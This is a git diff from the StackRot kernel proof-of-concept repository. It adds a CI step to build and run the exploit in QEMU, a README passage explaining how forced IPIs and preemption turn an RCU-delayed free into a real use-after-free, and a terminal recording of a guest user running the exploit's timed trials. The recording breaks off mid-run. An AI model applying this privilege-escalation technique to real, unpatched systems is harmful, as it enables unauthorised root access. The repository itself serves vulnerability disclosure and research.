diff --git a/.github/workflows/ci.yml b/.github/workflows/ci.yml index 867638e..a1029c2 100644 --- a/.github/workflows/ci.yml +++ b/.github/workflows/ci.yml @@ -20,7 +20,9 @@ jobs: - name: Build the exploit run: make - name: Install QEMU - run: sudo apt-get install -y qemu-system-x86-64 + run: | + sudo apt-get update + sudo apt-get install -y qemu-system-x86-64 - name: Run the exploit id: test continue-on-error: true diff --git a/README.md b/README.md index cc196d5..1f87737 100644 --- a/README.md +++ b/README.md @@ -5,6 +5,8 @@ [ci]: https://github.com/lrh2000/StackRot/actions +![Demo](pic/demo.svg) + A flaw was found in the handling of stack expansion in the Linux kernel 6.1 through 6.4, aka "Stack Rot". The maple tree, responsible for managing virtual memory areas, can undergo node replacement without properly acquiring the MM @@ -358,12 +360,11 @@ solutions are as follows: period will not end. 4. The iteration task is deliberately prolonged, allowing the RCU grace period to expire. This is the chosen solution. If the current RCU grace period - surpasses RCU_TASK_IPI_DELAY (defaulting to 0.5 seconds), inter-processor - interrupts (IPIs) are dispatched to all CPUs to verify that they are not in - RCU critical sections. In the case of VMA iteration, the answer is - negative, signifying that the RCU grace period concludes and the maple node - is freed, effectively converting UAFBR into a genuine use-after-free (UAF) - scenario. + surpasses `jiffies_till_first_fqs` (defaulting to several jiffies), an + inter-processor interrupt (IPI) will be dispatched to the victim CPU and + trigger voluntary preemption. In the case of VMA iteration, the voluntary + preemption can make the RCU grace period conclude and free the maple node, + effectively converting UAFBR into a genuine use-after-free (UAF) scenario. One significant observation is that during VMA iteration for `/proc/[pid]/maps`, it generates the entire file path for file-mapped memory diff --git a/pic/demo.cast b/pic/demo.cast new file mode 100644 index 0000000..fa23f8c --- /dev/null +++ b/pic/demo.cast @@ -0,0 +1,697 @@ +{"version": 2, "width": 160, "height": 43, "timestamp": 1716687998, "env": {"SHELL": "/bin/zsh", "TERM": "xterm-kitty"}} +[0.116816, "o", "\u001b[1m\u001b[7m%\u001b[27m\u001b[1m\u001b[0m \r \r"] +[0.132493, "o", "\u001b]0;ruihan@localhost: ~/projects/StackRot/exp\u0007"] +[0.170665, "o", "\r\u001b[0m\u001b[27m\u001b[24m\u001b[J\u001b[0m\u001b[49m\u001b[39m\r\n\u001b[A\u001b[0m\u001b[49m\u001b[39m\u001b[0m\u001b[49m\u001b[39m\u001b[0m\u001b[49m \u001b[0m\u001b[49m\u001b[38;5;31m \u001b[1m\u001b[38;5;31m\u001b[38;5;39m~\u001b[0m\u001b[38;5;39m\u001b[49m\u001b[38;5;31m/projects/\u001b[1m\u001b[38;5;31m\u001b[38;5;39mStackRot\u001b[0m\u001b[38;5;39m\u001b[49m\u001b[38;5;31m/\u001b[1m\u001b[38;5;31m\u001b[38;5;39mexp\u001b[0m\u001b[38;5;39m\u001b[49m\u001b[38;5;31m\u001b[0m\u001b[38;5;31m\u001b[49m\u001b[38;5;31m\u001b[0m\u001b[38;5;31m\u001b[49m \u001b[0m\u001b[38;5;31m\u001b[49m\u001b[38;5;178m\u001b[39mon \u001b[0m\u001b[49m\u001b[38;5;76m\u001b[0m\u001b[38;5;76m\u001b[49m\u001b[38;5;178m \u001b[38;5;76m master \u001b[38;5;178m!2\u001b[0m\u001b[38;5;178m\u001b[49m\u001b[38;5;178m\u001b[0m\u001b[38;5;178m\u001b[49m\u001b[30m \u001b[0m\u001b[30m\u001b[49m\u001b[39m\u001b[38;5;244m·································································································\u001b[0m\u001b[38;5;244m\u001b[49m\u001b[30m \u001b[0m\u001b[30m\u001b[49m\u001b[38;5;66m\u001b[39mat \u001b[0m\u001b[49m\u001b[38;5;66m 09:46:38 AM\u001b[0m\u001b[38;5;66m\u001b[49m\u001b[38;5;66m\u001b[0m\u001b[38;5;66m\u001b[49m\u001b[38;5;66m\u001b[0m\u001b[38;5;66m\u001b[49m\u001b[39m\r\n\u001b[0m\u001b[49m\u001b[39m\u001b[0m\u001b[49m\u001b[38;5;76m❯\u001b[0m\u001b[38;5;76m\u001b[49m\u001b[38;5;76m\u001b[0m\u001b[38;5;76m\u001b[49m\u001b[30m\u001b[0m\u001b[30m\u001b[49m\u001b[39m \u001b[0m\u001b[49m\u001b[39m\u001b[K\u001b[?1h"] +[0.171026, "o", "\u001b[?2004h"] +[0.765343, "o", "q"] +[0.774779, "o", "\b\u001b[1m\u001b[31mq\u001b[0m\u001b[39m"] +[0.77618, "o", "\b\u001b[1m\u001b[31mq\u001b[0m\u001b[39m\u001b[90memu-system-x86_64 \\\u001b[39m\r\r\n\u001b[90m -m 3G -smp 2 -enable-kvm \\\u001b[39m\u001b[K\r\r\n\u001b[90m -kernel ../env/bzImage_upstream_6.1.25 \\\u001b[39m\u001b[K\r\r\n\u001b[90m -initrd ../env/initramfs.cpio.gz \\\u001b[39m\u001b[K\r\r\n\u001b[90m -append \"quiet console=ttyS0 panic_on_warn=1\" \\\u001b[39m\u001b[K\r\r\n\u001b[90m -virtfs local,path=../env/exp,mount_tag=exp,security_model=none \\\u001b[39m\u001b[K\r\r\n\u001b[90m -nographic -no-reboot\u001b[39m\u001b[K\u001b[6A\u001b[26D"] +[0.954587, "o", "\b\u001b[1m\u001b[31mq\u001b[0m\u001b[39m\u001b[39me\u001b[39mm\u001b[39mu\u001b[39m-\u001b[39ms\u001b[39my\u001b[39ms\u001b[39mt\u001b[39me\u001b[39mm\u001b[39m-\u001b[39mx\u001b[39m8\u001b[39m6\u001b[39m_\u001b[39m6\u001b[39m4\u001b[39m \u001b[39m\\\u001b[1B\r\u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m-\u001b[39mm\u001b[39m \u001b[39m3\u001b[39mG\u001b[39m \u001b[39m-\u001b[39ms\u001b[39mm\u001b[39mp\u001b[39m \u001b[39m2\u001b[39m \u001b[39m-\u001b[39me\u001b[39mn\u001b[39ma\u001b[39mb\u001b[39ml\u001b[39me\u001b[39m-\u001b[39mk\u001b[39mv\u001b[39mm\u001b[39m \u001b[39m\\\u001b[1B\r\u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m-\u001b[39mk\u001b[39me\u001b[39mr\u001b[39mn\u001b[39me\u001b[39ml\u001b[39m \u001b[39m.\u001b[39m.\u001b[39m/\u001b[39me\u001b[39mn\u001b[39mv\u001b[39m/\u001b[39mb\u001b[39mz\u001b[39mI\u001b[39mm\u001b[39ma\u001b[39mg\u001b[39me\u001b[39m_\u001b[39mu\u001b[39mp\u001b[39ms\u001b[39mt\u001b[39mr\u001b[39me\u001b[39ma\u001b[39mm\u001b[39m_\u001b[39m6\u001b[39m.\u001b[39m1\u001b[39m.\u001b[39m2\u001b[39m5\u001b[39m \u001b[39m\\\u001b[1B\r\u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m-\u001b[39mi\u001b[39mn\u001b[39mi\u001b[39mt\u001b[39mr\u001b[39md\u001b[39m \u001b[39m.\u001b[39m.\u001b[39m/\u001b[39me\u001b[39mn\u001b[39mv\u001b[39m/\u001b[39mi\u001b[39mn\u001b[39mi\u001b[39mt\u001b[39mr\u001b[39ma\u001b[39mm\u001b[39mf\u001b[39ms\u001b[39m.\u001b[39mc\u001b[39mp\u001b[39mi\u001b[39mo\u001b[39m.\u001b[39mg\u001b[39mz\u001b[39m \u001b[39m\\\u001b[1B\r\u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m-\u001b[39ma\u001b[39mp\u001b[39mp\u001b[39me\u001b[39mn\u001b[39md\u001b[39m \u001b[39m\"\u001b[39mq\u001b[39mu\u001b[39mi\u001b[39me\u001b[39mt\u001b[39m \u001b[39mc\u001b[39mo\u001b[39mn\u001b[39ms\u001b[39mo\u001b[39ml\u001b[39me\u001b[39m=\u001b[39mt\u001b[39mt\u001b[39my\u001b[39mS\u001b[39m0\u001b[39m \u001b[39mp\u001b[39ma\u001b[39mn\u001b[39mi\u001b[39mc\u001b[39m_\u001b[39mo\u001b[39mn\u001b[39m_\u001b[39mw\u001b[39ma\u001b[39mr\u001b[39mn\u001b[39m=\u001b[39m1\u001b[39m\"\u001b[39m \u001b[39m\\\u001b[1B\r\u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m-\u001b[39mv\u001b[39mi\u001b[39mr\u001b[39mt\u001b[39mf\u001b[39ms\u001b[39m \u001b[39ml\u001b[39mo\u001b[39mc\u001b[39ma\u001b[39ml\u001b[39m,\u001b[39mp\u001b[39ma\u001b[39mt\u001b[39mh\u001b[39m=\u001b[39m.\u001b[39m.\u001b[39m/\u001b[39me\u001b[39mn\u001b[39mv\u001b[39m/\u001b[39me\u001b[39mx\u001b[39mp\u001b[39m,\u001b[39mm\u001b[39mo\u001b[39mu\u001b[39mn\u001b[39mt\u001b[39m_\u001b[39mt\u001b[39ma\u001b[39mg\u001b[39m=\u001b[39me\u001b[39mx\u001b[39mp\u001b[39m,\u001b[39ms\u001b[39me\u001b[39mc\u001b[39mu\u001b[39mr\u001b[39mi\u001b[39mt\u001b[39my\u001b[39m_\u001b[39mm\u001b[39mo\u001b[39md\u001b[39me\u001b[39ml\u001b[39m=\u001b[39mn\u001b[39mo\u001b[39mn\u001b[39me\u001b[39m \u001b[39m\\\u001b[1B\r\u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m-\u001b[39mn\u001b[39mo\u001b[39mg\u001b[39mr\u001b[39ma\u001b[39mp\u001b[39mh\u001b[39mi\u001b[39mc\u001b[39m \u001b[39m-\u001b[39mn\u001b[39mo\u001b[39m-\u001b[39mr\u001b[39me\u001b[39mb\u001b[39mo\u001b[39mo\u001b[39mt"] +[0.963453, "o", "\u001b[6A\u001b[27D\u001b[0m\u001b[32mq\u001b[32me\u001b[32mm\u001b[32mu\u001b[32m-\u001b[32ms\u001b[32my\u001b[32ms\u001b[32mt\u001b[32me\u001b[32mm\u001b[32m-\u001b[32mx\u001b[32m8\u001b[32m6\u001b[32m_\u001b[32m6\u001b[32m4\u001b[39m\u001b[2B\b\b\b\b\u001b[4m.\u001b[4m.\u001b[4m/\u001b[4me\u001b[4mn\u001b[4mv\u001b[4m/\u001b[4mb\u001b[4mz\u001b[4mI\u001b[4mm\u001b[4ma\u001b[4mg\u001b[4me\u001b[4m_\u001b[4mu\u001b[4mp\u001b[4ms\u001b[4mt\u001b[4mr\u001b[4me\u001b[4ma\u001b[4mm\u001b[4m_\u001b[4m6\u001b[4m.\u001b[4m1\u001b[4m.\u001b[4m2\u001b[4m5\u001b[24m\u001b[1B\u001b[30D\u001b[4m.\u001b[4m.\u001b[4m/\u001b[4me\u001b[4mn\u001b[4mv\u001b[4m/\u001b[4mi\u001b[4mn\u001b[4mi\u001b[4mt\u001b[4mr\u001b[4ma\u001b[4mm\u001b[4mf\u001b[4ms\u001b[4m.\u001b[4mc\u001b[4mp\u001b[4mi\u001b[4mo\u001b[4m.\u001b[4mg\u001b[4mz\u001b[24m\u001b[1B\u001b[24D\u001b[33m\"\u001b[33mq\u001b[33mu\u001b[33mi\u001b[33me\u001b[33mt\u001b[33m \u001b[33mc\u001b[33mo\u001b[33mn\u001b[33ms\u001b[33mo\u001b[33ml\u001b[33me\u001b[33m=\u001b[33mt\u001b[33mt\u001b[33my\u001b[33mS\u001b[33m0\u001b[33m \u001b[33mp\u001b[33ma\u001b[33mn\u001b[33mi\u001b[33mc\u001b[33m_\u001b[33mo\u001b[33mn\u001b[33m_\u001b[33mw\u001b[33ma\u001b[33mr\u001b[33mn\u001b[33m=\u001b[33m1\u001b[33m\"\u001b[39m\u001b[2B\u001b[24D"] +[2.351357, "o", "\u001b[?1l"] +[2.351592, "o", "\u001b[?2004l"] +[2.363004, "o", "\u001b[?25l\u001b[6A\r\r\u001b[A\u001b[0m\u001b[27m\u001b[24m\u001b[J\u001b[0m\u001b[49m\u001b[27m\u001b[24m\u001b[38;5;76m❯\u001b[0m\u001b[38;5;76m\u001b[49m\u001b[39m\u001b[27m\u001b[24m \u001b[32mqemu-system-x86_64\u001b[39m \\\u001b[K\r\r\n -m 3G -smp 2 -enable-kvm \\\u001b[K\r\r\n -kernel \u001b[4m../env/bzImage_upstream_6.1.25\u001b[24m \\\u001b[K\r\r\n -initrd \u001b[4m../env/initramfs.cpio.gz\u001b[24m \\\u001b[K\r\r\n -append \u001b[33m\"quiet console=ttyS0 panic_on_warn=1\"\u001b[39m \\\u001b[K\r\r\n -virtfs local,path=../env/exp,mount_tag=exp,security_model=none \\\u001b[K\r\r\n -nographic -no-reboot\u001b[K\u001b[?25h\r\r\n"] +[2.3671, "o", "\u001b]0;ruihan@localhost: qemu-system-x86_64 -m 3G -smp 2 -enable-kvm -kernel -initrd -append -virtf\u0007"] +[2.51747, "o", "\u001bc\u001b[?7l\u001b[2J"] +[2.524479, "o", "\u001b[0mSeaBIOS"] +[2.524512, "o", " (ver"] +[2.524621, "o", "sion "] +[2.524835, "o", "Arch Linux "] +[2.524877, "o", "1.1"] +[2.52492, "o", "6."] +[2.524955, "o", "3-"] +[2.524991, "o", "1-"] +[2.525022, "o", "1"] +[2.528608, "o", ")\r\r\n\r\n\r\niPXE "] +[2.528769, "o", "(http://ipxe"] +[2.528913, "o", ".org) 00:03."] +[2.529071, "o", "0 C900 PCI2"] +[2.529115, "o", ".10 "] +[2.529146, "o", "Pn"] +[2.529311, "o", "P PM"] +[2.529451, "o", "M+BEFD318"] +[2.529581, "o", "0+BEF3318"] +[2.529655, "o", "0 C90"] +[2.529718, "o", "0\r\r\nP"] +[2.529781, "o", "ress "] +[2.529813, "o", "Ctr"] +[2.529843, "o", "l-"] +[2.529874, "o", "B t"] +[2.529913, "o", "o "] +[2.529944, "o", "con"] +[2.529977, "o", "fi"] +[2.530007, "o", "gur"] +[2.530038, "o", "e "] +[2.530066, "o", "iPX"] +[2.530097, "o", "E "] +[2.53013, "o", "(P"] +[2.530167, "o", "CI "] +[2.5302, "o", "00:"] +[2.53023, "o", "03"] +[2.530258, "o", ".0)"] +[2.530286, "o", ".."] +[2.530319, "o", ".\r"] +[2.530352, "o", " "] +[2.530392, "o", " "] +[2.530425, "o", " "] +[2.530456, "o", " "] +[2.530486, "o", " "] +[2.530516, "o", " "] +[2.530546, "o", " "] +[2.530578, "o", " "] +[2.530617, "o", " "] +[2.530649, "o", " "] +[2.530679, "o", " "] +[2.530708, "o", " "] +[2.530737, "o", " "] +[2.530767, "o", " "] +[2.530798, "o", " "] +[2.530834, "o", " "] +[2.530866, "o", " "] +[2.530897, "o", " "] +[2.530926, "o", " "] +[2.530954, "o", " "] +[2.530982, "o", " "] +[2.531013, "o", " "] +[2.531048, "o", " "] +[2.53108, "o", " "] +[2.531112, "o", " "] +[2.53114, "o", " "] +[2.531167, "o", " "] +[2.531202, "o", " "] +[2.531233, "o", " "] +[2.531268, "o", " "] +[2.531302, "o", " "] +[2.531332, "o", " "] +[2.534468, "o", " \r\r\n\r\n\r\nB"] +[2.534524, "o", "oot"] +[2.534557, "o", "in"] +[2.534584, "o", "g "] +[2.534653, "o", "fro"] +[2.534697, "o", "m R"] +[2.534728, "o", "OM"] +[2.534785, "o", ".."] +[2.538663, "o", "\u001bc\u001b[?"] +[2.538717, "o", "7l\u001b[2J"] +[3.335479, "o", "\r\r\nmount -t devtmpfs none /dev\r\r\n"] +[3.335532, "o", "mount -t proc no"] +[3.335697, "o", "ne /proc\r\r\n"] +[3.335985, "o", "mount -t sysfs "] +[3.335995, "o", "n"] +[3.336009, "o", "o"] +[3.336027, "o", "ne"] +[3.336056, "o", " "] +[3.336071, "o", "/sy"] +[3.336082, "o", "s"] +[3.336142, "o", "\r\r\n"] +[3.336524, "o", "mount -t tmp"] +[3.336536, "o", "fs "] +[3.336544, "o", "n"] +[3.336565, "o", "o"] +[3.336618, "o", "ne /tm"] +[3.336723, "o", "p\r\r\n"] +[3.336977, "o", "\r\r\n"] +[3.336997, "o", "m"] +[3.337017, "o", "k"] +[3.337032, "o", "dir"] +[3.337085, "o", " /tmp/exp"] +[3.337186, "o", "\r\r\n"] +[3.337355, "o", "m"] +[3.337394, "o", "ou"] +[3.337435, "o", "nt -t 9p exp "] +[3.337487, "o", "/tmp/e"] +[3.337529, "o", "xp\r\r\n"] +[3.338462, "o", "\r\r\nsu"] +[3.338476, "o", " gu"] +[3.338521, "o", "est /tmp/e"] +[3.338634, "o", "xp/ex"] +[3.338729, "o", "ploit.sh\r\r\n"] +[3.339406, "o", "\r\r\ne"] +[3.339467, "o", "xec /bin/"] +[3.339502, "o", "sh\r\r\n"] +[3.339654, "o", "/bin/s"] +[3.33972, "o", "h: can't ac"] +[3.33978, "o", "cess tty; jo"] +[3.339836, "o", "b control tu"] +[3.339893, "o", "rned off\r\r\n"] +[3.339961, "o", "/ $ "] +[3.34002, "o", "\u001b[6n"] +[4.625131, "o", "w"] +[4.758887, "o", "h"] +[4.828593, "o", "o"] +[5.021094, "o", "a"] +[5.154565, "o", "m"] +[5.299151, "o", "i"] +[5.53151, "o", "\r\r\n"] +[5.532616, "o", "guest"] +[5.532709, "o", "\r\r\n"] +[5.5333, "o", "/ $ \u001b[6n"] +[7.211004, "o", "l"] +[7.257954, "o", "s"] +[7.372687, "o", " "] +[7.516475, "o", "/"] +[7.64683, "o", "r"] +[7.762617, "o", "o"] +[7.889331, "o", "o"] +[7.935153, "o", "t"] +[8.02509, "o", " "] +[8.096305, "o", "-"] +[8.228157, "o", "a"] +[8.298099, "o", "l"] +[8.458985, "o", "\r\r\n"] +[8.460385, "o", "ls: can't o"] +[8.46048, "o", "pen '"] +[8.46085, "o", "/root': Perm"] +[8.460907, "o", "is"] +[8.460982, "o", "si"] +[8.461036, "o", "on"] +[8.461119, "o", " "] +[8.46117, "o", "deni"] +[8.461222, "o", "ed"] +[8.461692, "o", "\r\r\ntotal 0\r\r\n"] +[8.462297, "o", "/ $ \u001b[6n"] +[9.554346, "o", "c"] +[9.632116, "o", "a"] +[9.797209, "o", "t"] +[9.862369, "o", " "] +[9.98996, "o", "/"] +[10.10625, "o", "r"] +[10.214157, "o", "o"] +[10.34225, "o", "o"] +[10.417478, "o", "t"] +[10.587181, "o", "/"] +[10.716165, "o", "f"] +[10.859593, "o", "l"] +[10.914587, "o", "a"] +[11.035834, "o", "g"] +[11.174126, "o", "\r\r\n"] +[11.175091, "o", "cat: can't open "] +[11.175264, "o", "'/root/flag': "] +[11.175378, "o", "Pe"] +[11.175972, "o", "rmission denied\r\r\n"] +[11.176482, "o", "/ $"] +[11.176519, "o", " \u001b[6n"] +[14.233578, "o", "/"] +[14.439453, "o", "t"] +[14.533719, "o", "m"] +[14.700786, "o", "p"] +[14.937766, "o", "/"] +[15.053008, "o", "e"] +[15.240559, "o", "x"] +[15.335884, "o", "p"] +[15.552946, "o", "/"] +[15.665568, "o", "e"] +[15.847029, "o", "x"] +[15.964125, "o", "p"] +[16.117963, "o", "l"] +[16.284625, "o", "o"] +[16.380198, "o", "i"] +[16.482519, "o", "t"] +[17.35005, "o", "\r\r\n"] +[17.354879, "o", "\u001b[0m[ ] "] +[17.354953, "o", "Creatin"] +[17.355252, "o", "g "] +[17.355302, "o", "a very deep f"] +[17.355347, "o", "il"] +[17.355653, "o", "e: 0/"] +[17.355913, "o", "65536"] +[17.356193, "o", "\r\r\n"] +[17.382317, "o", "\u001b[0m[ ] Creating"] +[17.382591, "o", " a very deep file"] +[17.382628, "o", ": 4096/65536\r\r\n"] +[17.397153, "o", "\u001b[0m[ ] Creating"] +[17.397188, "o", " a ve"] +[17.397199, "o", "ry"] +[17.397221, "o", " d"] +[17.397239, "o", "e"] +[17.397251, "o", "ep"] +[17.397263, "o", " f"] +[17.397291, "o", "il"] +[17.397598, "o", "e: 8192/65536\r\r\n"] +[17.412258, "o", "\u001b[0m[ ] Creating"] +[17.412279, "o", " "] +[17.412289, "o", "a"] +[17.412307, "o", " v"] +[17.412324, "o", "e"] +[17.412336, "o", "ry"] +[17.412347, "o", " "] +[17.412359, "o", "de"] +[17.412377, "o", "e"] +[17.412388, "o", "p "] +[17.412707, "o", "file: 12288/65536\r\r\n"] +[17.42823, "o", "\u001b[0m[ ] Creating"] +[17.428352, "o", " a ve"] +[17.428364, "o", "r"] +[17.428379, "o", "y "] +[17.428468, "o", "deep fil"] +[17.428493, "o", "e:"] +[17.428699, "o", " 16384/6"] +[17.428711, "o", "5536\r\r\n"] +[17.443438, "o", "\u001b[0m[ ] Creating a"] +[17.44346, "o", " ver"] +[17.443478, "o", "y"] +[17.44349, "o", " d"] +[17.443512, "o", "e"] +[17.443523, "o", "ep"] +[17.443536, "o", " "] +[17.443546, "o", "f"] +[17.443557, "o", "il"] +[17.443886, "o", "e: 20480/65536\r\r\n"] +[17.458929, "o", "\u001b[0m[ "] +[17.458953, "o", "] Creat"] +[17.458967, "o", "ing"] +[17.459119, "o", " a very de"] +[17.459133, "o", "ep"] +[17.459145, "o", " f"] +[17.459163, "o", "i"] +[17.459183, "o", "l"] +[17.459386, "o", "e: 24576/6553"] +[17.459439, "o", "6\r\r\n"] +[17.475016, "o", "\u001b[0m[ ] Creating"] +[17.475039, "o", " a v"] +[17.47505, "o", "er"] +[17.475067, "o", "y "] +[17.475091, "o", "d"] +[17.475102, "o", "ee"] +[17.475115, "o", "p "] +[17.475131, "o", "f"] +[17.475142, "o", "il"] +[17.475249, "o", "e: 28672/"] +[17.475438, "o", "65536\r\r\n"] +[17.490173, "o", "\u001b[0m[ ] Creating"] +[17.490218, "o", " a ver"] +[17.490306, "o", "y "] +[17.490325, "o", "deep file"] +[17.490341, "o", ": "] +[17.490518, "o", "32768/65536"] +[17.49053, "o", "\r\r\n"] +[17.506033, "o", "\u001b[0m[ ] Cr"] +[17.506064, "o", "eating"] +[17.506205, "o", " a ve"] +[17.506252, "o", "ry deep "] +[17.506267, "o", "fil"] +[17.50628, "o", "e:"] +[17.506293, "o", " "] +[17.50645, "o", "36864"] +[17.506509, "o", "/65536\r\r\n"] +[17.521932, "o", "\u001b[0m[ ] Creating"] +[17.522016, "o", " a very dee"] +[17.522029, "o", "p "] +[17.52211, "o", "file: 409"] +[17.52212, "o", "6"] +[17.522133, "o", "0"] +[17.522144, "o", "/"] +[17.522165, "o", "6"] +[17.522177, "o", "553"] +[17.522354, "o", "6\r\r\n"] +[17.537208, "o", "\u001b[0m[ ] Creating"] +[17.537236, "o", " a very d"] +[17.537281, "o", "eep fi"] +[17.537378, "o", "l"] +[17.537527, "o", "e: 45056/65536\r\r\n"] +[17.552094, "o", "\u001b[0m[ ] Creating"] +[17.552129, "o", " "] +[17.55214, "o", "a"] +[17.552153, "o", " "] +[17.552171, "o", "v"] +[17.552189, "o", "er"] +[17.55225, "o", "y "] +[17.552266, "o", "deep f"] +[17.552427, "o", "il"] +[17.55244, "o", "e: 49152/65536\r"] +[17.552452, "o", "\r\n"] +[17.56693, "o", "\u001b[0m[ ] Creating"] +[17.566984, "o", " a ve"] +[17.567002, "o", "ry"] +[17.567015, "o", " "] +[17.567075, "o", "deep fi"] +[17.56709, "o", "l"] +[17.567255, "o", "e: 53248/65"] +[17.567305, "o", "536\r\r\n"] +[17.581394, "o", "\u001b[0m[ ] Creating"] +[17.581412, "o", " a"] +[17.581423, "o", " "] +[17.581434, "o", "v"] +[17.581448, "o", "e"] +[17.58146, "o", "ry"] +[17.581479, "o", " d"] +[17.581493, "o", "ee"] +[17.581684, "o", "p fil"] +[17.581727, "o", "e: 57344/65536\r\r\n"] +[17.596298, "o", "\u001b[0m[ ] Creating"] +[17.596328, "o", " "] +[17.596338, "o", "a"] +[17.59635, "o", " v"] +[17.596372, "o", "e"] +[17.596386, "o", "ry "] +[17.596397, "o", "d"] +[17.596458, "o", "eep fil"] +[17.596615, "o", "e: 61440/65536\r\r\n"] +[17.610728, "o", "\u001b[32m"] +[17.610745, "o", "[+] Creat"] +[17.610755, "o", "e"] +[17.610766, "o", "d"] +[17.610998, "o", " "] +[17.611013, "o", "th"] +[17.611054, "o", "e"] +[17.611112, "o", " "] +[17.611158, "o", "d"] +[17.611198, "o", "eep"] +[17.611261, "o", " "] +[17.6113, "o", "fi"] +[17.611381, "o", "l"] +[17.611423, "o", "e\r\r\n"] +[17.814919, "o", "\u001b[0m[ ]"] +[17.815083, "o", " Trying w"] +[17.815733, "o", "it"] +[17.815828, "o", "h free_timing_"] +[17.816228, "o", "msec="] +[17.816298, "o", "0"] +[17.816643, "o", "\r\r\n"] +[17.830253, "o", "\u001b[0m[ ] UAF"] +[17.830362, "o", " stat"] +[17.830426, "o", "e "] +[17.830504, "o", "update: \""] +[17.830584, "o", "free\""] +[17.830649, "o", " has"] +[17.830716, "o", " bee"] +[17.830774, "o", "n co"] +[17.830831, "o", "mple"] +[17.83137, "o", "ted\r\r\n"] +[17.918318, "o", "\u001b[0m[ ] UAF state update: \"use\" has been completed"] +[17.918367, "o", "\r\r\n"] +[17.94395, "o", "\\012\\012\\012\\012f\\012t\\012y\\012z\\012ae\\012\\012\\012\\012\\012\\01"] +[17.944, "o", "2\\012\\012v\\012\\"] +[17.944065, "o", "012a\\"] +[17.944301, "o", "012\\012yo\\012\\012\\012\\012\\012k\\012\\012o\\012\\012\\012h\\012j\\"] +[17.944326, "o", "012\\01"] +[17.944445, "o", "2\\012\\012ia\\012\\012\\012jp"] +[17.94458, "o", "\\012\\012\\012\\012k\\012f\\012"] +[17.944627, "o", "g\\012\\012\\01"] +[17.944663, "o", "2\\0"] +[17.944705, "o", "12\\012\\01"] +[17.944743, "o", "2\\012om"] +[17.94478, "o", "\\012ti\\01"] +[17.944817, "o", "2\\012\\0"] +[17.944829, "o", "12\\012f\\0"] +[17.944884, "o", "12"] +[17.944921, "o", "\\012u\\012\\0"] +[17.94496, "o", "12g\\012\\"] +[17.944974, "o", "012o\\012"] +[17.945023, "o", "y\\0"] +[17.94506, "o", "12p\\012\\01"] +[17.945074, "o", "2\\012c\\0"] +[17.945123, "o", "12q\\012\\01"] +[17.945156, "o", "2\\0"] +[17.945189, "o", "12\\012"] +[17.94523, "o", "cf\\012\\0"] +[17.945244, "o", "12p\\012"] +[17.945257, "o", "t\\0"] +[17.945333, "o", "12\\012\\012\\"] +[17.945371, "o", "012\\012\\"] +[17.945387, "o", "012\\012i\\"] +[17.945431, "o", "012g\\012\\"] +[17.945464, "o", "012"] +[17.945476, "o", "rdu\\0"] +[17.945487, "o", "12s"] +[17.945563, "o", "cq\\01"] +[17.945604, "o", "2\\012etbq\\012\\"] +[17.945641, "o", "012\\012\\0"] +[17.945652, "o", "12\\012"] +[17.945702, "o", "\r\r\n0007"] +[17.945716, "o", "e000"] +[17.945773, "o", "-00"] +[17.945785, "o", "07f000 rw-p"] +[17.945833, "o", " 00000000 "] +[17.945867, "o", "0"] +[17.9459, "o", "0:00 0 "] +[17.945916, "o", "\r\r\n00"] +[17.945965, "o", "07f000-0008"] +[17.945999, "o", "100"] +[17.946031, "o", "0 rw-p"] +[17.946064, "o", " 0000000"] +[17.946105, "o", "0 00:"] +[17.946117, "o", "00 0 \r\r\n"] +[17.946166, "o", "ffffffff"] +[17.946198, "o", "ff6"] +[17.946209, "o", "00000"] +[17.946262, "o", "-f"] +[17.946273, "o", "fffffffff6010"] +[17.946326, "o", "0"] +[17.946363, "o", "0 --xp 00000"] +[17.9464, "o", "000 0"] +[17.946436, "o", "0:00 0 "] +[17.946474, "o", " "] +[17.94651, "o", " "] +[17.946524, "o", "[vsysca"] +[17.946569, "o", "ll]\r\r\n"] +[17.946601, "o", "\r"] +[17.946615, "o", "\r\n\u001b[31"] +[17.946663, "o", "m[-] Unsucc"] +[17.946704, "o", "e"] +[17.94674, "o", "ssful exp"] +[17.946777, "o", "loit tr"] +[17.946814, "o", "ial: Mem"] +[17.946852, "o", "ory maps"] +[17.946888, "o", " contai"] +[17.946902, "o", "n the fo"] +[17.946948, "o", "urth line"] +[17.946985, "o", "\r\r\n"] +[17.948353, "o", "\u001b[32"] +[17.948374, "o", "m[+]"] +[17.948389, "o", " H"] +[17.948458, "o", "ealcheck pa"] +[17.948495, "o", "sse"] +[17.948511, "o", "d: \"Use\""] +[17.948615, "o", " happens after \""] +[17.94878, "o", "free\"\r\r\n\u001b[0m[ ] Trying with free_timing_"] +[17.948925, "o", "msec=50\r\r\n"] +[18.00679, "o", "\u001b[0m[ ] UAF state update: \"free\" has been completed\r\r\n"] +[18.030714, "o", "\u001b[0m[ ] UAF state update: \"use\" has been completed\r\r\n"] +[18.056084, "o", "\\012\\012\\012\\012f\\012t\\012y\\012z\\012ae\\012\\012\\012\\012\\012\\012\\012\\012"] +[18.05613, "o", "v\\012\\012a\\012"] +[18.056284, "o", "\\012yo\\"] +[18.056327, "o", "012\\012\\012\\012\\012k\\012\\012o\\012\\012"] +[18.05636, "o", "\\012h\\"] +[18.056394, "o", "012j\\012\\"] +[18.05643, "o", "012\\"] +[18.056456, "o", "012\\012ia"] +[18.05649, "o", "\\012\\0"] +[18.056516, "o", "12\\012j"] +[18.056542, "o", "p\\012\\"] +[18.056576, "o", "012\\0"] +[18.056607, "o", "12\\012k\\0"] +[18.056636, "o", "12f\\0"] +[18.056672, "o", "12g\\012"] +[18.057036, "o", "\\012\\012\\012\\012\\012\\012om\\012ti\\012\\012\\012\\012f\\012\\012u\\012\\012g\\012\\012o\\012"] +[18.057193, "o", "y\\012p\\012\\012\\012c\\012q\\012\\012\\012"] +[18.057261, "o", "\\012cf\\012\\012p\\"] +[18.057317, "o", "012t\\012\\012"] +[18.057376, "o", "\\012\\012\\012\\"] +[18.05743, "o", 